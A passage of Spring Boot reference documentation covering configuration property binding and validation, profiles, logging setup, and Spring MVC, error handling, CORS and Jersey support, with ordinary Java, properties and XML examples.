firstName;\n\n\t\tpublic String getFirstName() {\n\t\t\treturn this.firstName;\n\t\t}\n\n\t\tpublic void setFirstName(String firstName) {\n\t\t\tthis.firstName = firstName;\n\t\t}\n\n\t}\n----\n\nThe following property names can all be used:\n\n.relaxed binding\n[cols="1,4"]\n|===\n| Property | Note\n\n|`person.firstName`\n|Standard camel case syntax.\n\n|`person.first-name`\n|Dashed notation, recommended for use in `.properties` and `.yml` files.\n\n|`PERSON_FIRST_NAME`\n|Upper case format. Recommended when using system environment variables.\n|===\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans.
If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean) or custom `Converters` (with\nbean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to\nlimit the dependencies your `ConversionService` is using. Typically, any dependency that\nyou'd require may not be fully initialized at creation time. You may want to rename your\ncustom `ConversionService` if it's not required for configuration key coercion.\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix="connection")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nIn order to validate values of nested properties, you must annotate the associated field\nas `@Valid` to trigger its validation. For example, building upon the above\n`ConnectionSettings` example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix="connection")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\t@Valid\n\t\tprivate RemoteAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t\tprivate static class RemoteAddress {\n\n\t\t\t@NotEmpty\n\t\t\tpublic String hostname;\n\n\t\t\t\/\/ ... getters and setters\n\n\t\t}\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`. There is a\n{github-code}\/spring-boot-samples\/spring-boot-sample-property-validation[Validation sample]\nso you can see how to set things up.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n_<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>_\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile("production")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties: the highest `PropertySource` wins.
This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile-specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with the following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile-specific configuration files\nProfile-specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee _<<boot-features-external-config-profile-specific-properties>>_ for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J], http:\/\/logging.apache.org\/log4j\/2.x\/[Log4J2] and\nhttp:\/\/logback.qos.ch\/[Logback]. In each case loggers are pre-configured to use console\noutput with optional file output also available.\n\nBy default, if you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing.
Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Thread name -- Enclosed in square brackets (may be truncated for console output).\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\nNOTE: Logback does not have a `FATAL` level (it is mapped to `ERROR`)\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nNOTE: you can also specify `debug=true` in your `application.properties`.\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, Spring Boot will only log to the console and will not write log files. If you\nwant to write log files in addition to the console output you need to set a\n`logging.file` or `logging.path` property (for example in your `application.properties`).\n\nThe following table shows how the `logging.*` properties can be used together:\n\n.Logging properties\n[cols=\"1,1,1,4\"]\n|===\n|`logging.file` |`logging.path` |Example |Description\n|_(none)_\n|_(none)_\n|\n|Console only logging.\n\n|Specific file\n|_(none)_\n|`my.log`\n|Writes to the specified log file. Names can be an exact location or relative to the\ncurrent directory.\n\n|_(none)_\n|Specific directory\n|`\/var\/log`\n|Writes `spring.log` to the specified directory. 
Names can be an exact location or\nrelative to the current directory.\n|===\n\nLog files will rotate when they reach 10 MB and, as with console output, `ERROR`, `WARN`\nand `INFO` level messages are logged by default.\n\nNOTE: The logging system is initialized early in the application lifecycle and as such\nlogging properties will not be found in property files loaded via `@PropertySource`\nannotations.\n\n\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using\n'`+logging.level.*=LEVEL+`' where '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR,\nFATAL, OFF. Example `application.properties`:\n\n[source,properties,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nNOTE: By default Spring Boot remaps Thymeleaf `INFO` messages so that they are logged at\n`DEBUG` level. This helps to reduce noise in the standard log output. See\n{sc-spring-boot}\/logging\/logback\/LevelRemappingAppender.{sc-ext}[`LevelRemappingAppender`]\nfor details of how you can apply remapping in your own configuration.\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`.\n\nNOTE: Since logging is initialized *before* the `ApplicationContext` is created, it isn't\npossible to control logging from `@PropertySources` in Spring `@Configuration` files.\nSystem properties and the conventional Spring Boot external configuration files work just\nfine.\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback-spring.xml`, `logback-spring.groovy`, `logback.xml` or `logback.groovy`\n\n|Log4j\n|`log4j-spring.properties`, `log4j-spring.xml`, `log4j.properties` or `log4j.xml`\n\n|Log4j2\n|`log4j2-spring.xml` or `log4j2.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nNOTE: When possible we recommend that you use the `-spring` variants for your logging\nconfiguration (for example `logback-spring.xml` rather than `logback.xml`). If you use\nstandard configuration locations, Spring cannot completely control log initialization.\n\nWARNING: There are known classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.exception-conversion-word`\n|`LOG_EXCEPTION_CONVERSION_WORD`\n|The conversion word that's used when logging exceptions.\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`logging.pattern.console`\n|`CONSOLE_LOG_PATTERN`\n|The log pattern to use on the console (stdout). (Not supported with JDK logger.)\n\n|`logging.pattern.file`\n|`FILE_LOG_PATTERN`\n|The log pattern to use in a file (if LOG_FILE enabled).
(Not supported with JDK logger.)\n\n|`logging.pattern.level`\n|`LOG_LEVEL_PATTERN`\n|The format to use to render the log level (default `%5p`). (The `logging.pattern.level` form is only supported by Logback.)\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\n\nAll the supported logging systems can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\n[TIP]\n====\n\nYou can add MDC and other ad-hoc content to log lines by overriding\nonly the `LOG_LEVEL_PATTERN` (or `logging.pattern.level` with\nLogback). For example, if you use `logging.pattern.level=user:%X{user}\n%5p` then the default log format will contain an MDC entry for "user"\nif it exists, e.g.\n\n----\n2015-09-30 12:30:04.031 user:juergen INFO 22174 --- [ nio-8080-exec-0] demo.Controller Handling authenticated request\n----\n====\n\n\n\n[[boot-features-logback-extensions]]\n=== Logback extensions\nSpring Boot includes a number of extensions to Logback which can help with advanced\nconfiguration. You can use these extensions in your `logback-spring.xml` configuration\nfile.\n\nNOTE: You cannot use extensions in the standard `logback.xml` configuration file since\nit's loaded too early. You need to either use `logback-spring.xml` or define a\n`logging.config` property.\n\n\n\n==== Profile-specific configuration\nThe `<springProfile>` tag allows you to optionally include or exclude sections of\nconfiguration based on the active Spring profiles. Profile sections are supported anywhere\nwithin the `<configuration>` element. Use the `name` attribute to specify which profile\naccepts the configuration. Multiple profiles can be specified using a comma-separated\nlist.\n\n[source,xml,indent=0]\n----\n\t<springProfile name="staging">\n\t\t<!-- configuration to be enabled when the "staging" profile is active -->\n\t<\/springProfile>\n\n\t<springProfile name="dev, staging">\n\t\t<!-- configuration to be enabled when the "dev" or "staging" profiles are active -->\n\t<\/springProfile>\n\n\t<springProfile name="!production">\n\t\t<!-- configuration to be enabled when the "production" profile is not active -->\n\t<\/springProfile>\n----\n\n\n\n==== Environment properties\nThe `<springProperty>` tag allows you to surface properties from the Spring `Environment`\nfor use within Logback. This can be useful if you want to access values from your\n`application.properties` file in your Logback configuration. The tag works in a similar\nway to Logback's standard `<property>` tag, but rather than specifying a direct `value`\nyou specify the `source` of the property (from the `Environment`). You can use the `scope`\nattribute if you need to store the property somewhere other than in `local` scope.\n\n[source,xml,indent=0]\n----\n\t<springProperty scope="context" name="fluentHost" source="myapp.fluentd.host"\/>\n\t<appender name="FLUENT" class="ch.qos.logback.more.appenders.DataFluentAppender">\n\t\t<remoteHost>${fluentHost}<\/remoteHost>\n\t\t...\n\t<\/appender>\n----\n\nTIP: The `RelaxedPropertyResolver` is used to access `Environment` properties. If you\nspecify the `source` in dashed notation (`my-property-name`) all the relaxed variations\nwill be tried (`myPropertyName`, `MY_PROPERTY_NAME` etc).\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development.
You can easily create a\nself-contained HTTP server using embedded Tomcat, Jetty, or Undertow. Most web\napplications will use the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n_<<getting-started.adoc#getting-started-first-application, Getting started>>_ section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The '`Spring Web MVC framework`'\nThe Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich\n'`model view controller`' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodesResolver` (see below).\n* Static `index.html` support.\n* Custom `Favicon` support.\n* Automatic use of a `ConfigurableWebBindingInitializer` bean (see below).\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using the Jackson\nXML extension if available, else using JAXB). 
Strings are encoded using `UTF-8` by\ndefault.\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\nAny `HttpMessageConverter` bean that is present in the context will be added to the list of\nconverters. You can also override default converters that way.\n\n\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a directory called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nYou can customize the static resource locations using `spring.resources.staticLocations`\n(replacing the default values with a list of directory locations). If you do this the\ndefault welcome page detection will switch to your custom locations, so if there is an\n`index.html` in any of your locations on startup, it will be the home page of the\napplication.\n\nIn addition to the '`standard`' static resource locations above, a special case is made\nfor http:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `+\/webjars\/**+`\nwill be served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` directory if your application will be packaged as a\njar. 
Although this directory is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\nSpring Boot also supports advanced resource handling features provided by Spring MVC,\nallowing use cases such as cache busting static resources or using version agnostic URLs\nfor Webjars.\n\nFor example, the following configuration will configure a cache busting solution\nfor all static resources, effectively adding a content hash in URLs, such as\n`<link href=\"\/css\/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css\"\/>`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.resources.chain.strategy.content.enabled=true\n\tspring.resources.chain.strategy.content.paths=\/**\n----\n\nNOTE: Links to resources are rewritten at runtime in template, thanks to a\n`ResourceUrlEncodingFilter`, auto-configured for Thymeleaf and Velocity. You should\nmanually declare this filter when using JSPs. Other template engines aren't automatically\nsupported right now, but can be with custom template macros\/helpers and the use of the\n{spring-javadoc}\/web\/servlet\/resource\/ResourceUrlProvider.{dc-ext}[`ResourceUrlProvider`].\n\nWhen loading resources dynamically with, for example, a JavaScript module loader, renaming\nfiles is not an option. That's why other strategies are also supported and can be combined.\nA \"fixed\" strategy will add a static version string in the URL, without changing the file\nname:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.resources.chain.strategy.content.enabled=true\n\tspring.resources.chain.strategy.content.paths=\/**\n\tspring.resources.chain.strategy.fixed.enabled=true\n\tspring.resources.chain.strategy.fixed.paths=\/js\/lib\/\n\tspring.resources.chain.strategy.fixed.version=v12\n----\n\nWith this configuration, JavaScript modules located under `\"\/js\/lib\/\"` will use a fixed\nversioning strategy `\"\/v12\/js\/lib\/mymodule.js\"` while other resources will still use\nthe content one `<link href=\"\/css\/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css\"\/>`.\n\nSee {sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[`ResourceProperties`]\nfor more of the supported options.\n\n[TIP]\n====\nThis feature has been thoroughly described in a dedicated\nhttps:\/\/spring.io\/blog\/2014\/07\/24\/spring-framework-4-1-handling-static-web-resources[blog post]\nand in Spring Framework's {spring-reference}\/#mvc-config-static-resources[reference documentation].\n====\n\n\n\n[[boot-features-spring-mvc-web-binding-initializer]]\n==== ConfigurableWebBindingInitializer\nSpring MVC uses a `WebBindingInitializer` to initialize a `WebDataBinder` for a particular\nrequest. If you create your own `ConfigurableWebBindingInitializer` `@Bean`, Spring Boot\nwill automatically configure Spring MVC to use it.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. 
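\n\nAs a quick illustration of serving dynamic HTML, here is a minimal sketch of a controller\nthat fills a model and returns a logical view name (the controller, mapping and template\nname are invented for the example):\n\n[source,java,indent=0]\n----\n\t@Controller\n\tpublic class WelcomeController {\n\n\t\t@RequestMapping("\/welcome")\n\t\tpublic String welcome(Map<String, Object> model) {\n\t\t\tmodel.put("message", "Hello World");\n\t\t\t\/\/ resolved by the configured templating engine, e.g. a\n\t\t\t\/\/ "welcome" template on the classpath for Thymeleaf\n\t\t\treturn "welcome";\n\t\t}\n\n\t}\n----\n\nThe returned string is a logical view name rather than markup; the templating engine\nrenders the actual HTML.\n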
\nMany other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/docs.groovy-lang.org\/docs\/next\/html\/documentation\/template-engines.html#_the_markuptemplateengine[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n * http:\/\/mustache.github.io\/[Mustache]\n\nTIP: JSPs should be avoided if possible; there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\nWhen you're using one of these templating engines with the default configuration, your\ntemplates will be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: IntelliJ IDEA orders the classpath differently depending on how you run your\napplication. Running your application in the IDE via its main method will result in a\ndifferent ordering to when you run your application using Maven or Gradle or from its\npackaged jar. This can cause Spring Boot to fail to find the templates on the classpath.\nIf you're affected by this problem you can reorder the classpath in the IDE to place the\nmodule's classes and resources first. Alternatively, you can configure the template prefix\nto search every templates directory on the classpath: `classpath*:\/templates\/`.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a sensible\nway, and it is registered as a '`global`' error page in the servlet container. For machine\nclients it will produce a JSON response with details of the error, the HTTP status and the\nexception message. For browser clients there is a '`whitelabel`' error view that renders\nthe same data in HTML format (to customize it just add a `View` that resolves to\n'`error`'). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean of\ntype `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nTIP: The `BasicErrorController` can be used as a base class for a custom `ErrorController`.\nThis is particularly useful if you want to add a handler for a new content type (the default\nis to handle `text\/html` specifically and provide a fallback for everything else). To do that\njust extend `BasicErrorController` and add a public method with a `@RequestMapping` that\nhas a `produces` attribute, and create a bean of your new type.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. Assuming that you have a\nmapping for `\/400`:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer() {\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, "\/400"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like\n{spring-reference}\/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and\n{spring-reference}\/#mvc-ann-controller-advice[`@ControllerAdvice`], as in the sketch\nbelow.
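\n\nFor example, a minimal sketch (the advice class, exception type and response shape are\nillustrative, not something Spring Boot prescribes) could translate a specific exception\ninto a JSON error response for the `MyRestController` shown earlier:\n\n[source,java,indent=0]\n----\n\t@ControllerAdvice(basePackageClasses = MyRestController.class)\n\tpublic class MyExceptionHandler {\n\n\t\t\/\/ map IllegalStateException from matching controllers to an HTTP 409\n\t\t@ExceptionHandler(IllegalStateException.class)\n\t\t@ResponseStatus(HttpStatus.CONFLICT)\n\t\t@ResponseBody\n\t\tpublic Map<String, String> handleConflict(IllegalStateException ex) {\n\t\t\treturn Collections.singletonMap("message", ex.getMessage());\n\t\t}\n\n\t}\n----\n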
\nThe `ErrorController` will then pick up any unhandled exceptions.\n\nN.B. If you register an `ErrorPage` with a path that will end up being handled by a\n`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),\nthen the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilter() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setFilter(new MyFilter());\n\t\t...\n\t\tregistration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));\n\t\treturn registration;\n\t}\n----\n\n(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).\n\n\n\n[[boot-features-error-handling-websphere]]\n===== Error Handling on WebSphere Application Server\nWhen deployed to a servlet container, Spring Boot uses its error page filter to forward\na request with an error status to the appropriate error page. The request can only be\nforwarded to the correct error page if the response has not already been committed. By\ndefault, WebSphere Application Server 8.0 and later commits the response upon successful\ncompletion of a servlet's service method. You should disable this behaviour by setting\n`com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`.\n\n\n\n[[boot-features-spring-hateoas]]\n==== Spring HATEOAS\nIf you're developing a RESTful API that makes use of hypermedia, Spring Boot provides\nauto-configuration for Spring HATEOAS that works well with most applications. The\nauto-configuration replaces the need to use `@EnableHypermediaSupport` and registers a\nnumber of beans to ease building hypermedia-based applications including a\n`LinkDiscoverers` (for client side support) and an `ObjectMapper` configured to correctly\nmarshal responses into the desired representation. The `ObjectMapper` will be customized\nbased on the `spring.jackson.*` properties or a `Jackson2ObjectMapperBuilder` bean if one\nexists.\n\nYou can take control of Spring HATEOAS's configuration by using\n`@EnableHypermediaSupport`.
Note that this will disable the `ObjectMapper` customization\ndescribed above.\n\n\n\n[[boot-features-cors]]\n==== CORS support\n\nhttp:\/\/en.wikipedia.org\/wiki\/Cross-origin_resource_sharing[Cross-origin resource sharing]\n(CORS) is a http:\/\/www.w3.org\/TR\/cors\/[W3C specification] implemented by\nhttp:\/\/caniuse.com\/#feat=cors[most browsers] that allows you to specify in a flexible\nway what kind of cross domain requests are authorized, instead of using some less secure\nand less powerful approaches like IFRAME or JSONP.\n\nAs of version 4.2, Spring MVC {spring-reference}\/#cors[supports CORS] out of the box.\nUsing {spring-reference}\/#_controller_method_cors_configuration[controller method CORS\nconfiguration] with\n{spring-javadoc}\/org\/springframework\/web\/bind\/annotation\/CrossOrigin.html[`@CrossOrigin`]\nannotations in your Spring Boot application does not require any specific configuration.\n{spring-reference}\/#_global_cors_configuration[Global CORS configuration] can be defined\nby registering a `WebMvcConfigurer` bean with a customized `addCorsMappings(CorsRegistry)`\nmethod:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic WebMvcConfigurer corsConfigurer() {\n\t\t\treturn new WebMvcConfigurerAdapter() {\n\t\t\t\t@Override\n\t\t\t\tpublic void addCorsMappings(CorsRegistry registry) {\n\t\t\t\t\tregistry.addMapping(\"\/api\/**\");\n\t\t\t\t}\n\t\t\t};\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-jersey]]\n=== JAX-RS and Jersey\nIf you prefer the JAX-RS programming model for REST endpoints you can use one of the\navailable implementations instead of Spring MVC. Jersey 1.x and Apache Celtix work quite\nwell out of the box if you just register their `Servlet` or `Filter` as a `@Bean` in your\napplication context. Jersey 2.x has some native Spring support so we also provide\nauto-configuration support for it in Spring Boot together with a starter.\n\nTo get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a\ndependency and then you need one `@Bean` of type `ResourceConfig` in which you register\nall the endpoints:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t}\n\n\t}\n----\n\nAll the registered endpoints should be `@Components` with HTTP resource annotations\n(`@GET` etc.), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\t@Path(\"\/hello\")\n\tpublic class Endpoint {\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello\";\n\t\t}\n\n\t}\n----\n\nSince the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you\ncan `@Autowired` dependencies and inject external configuration with `@Value`. The 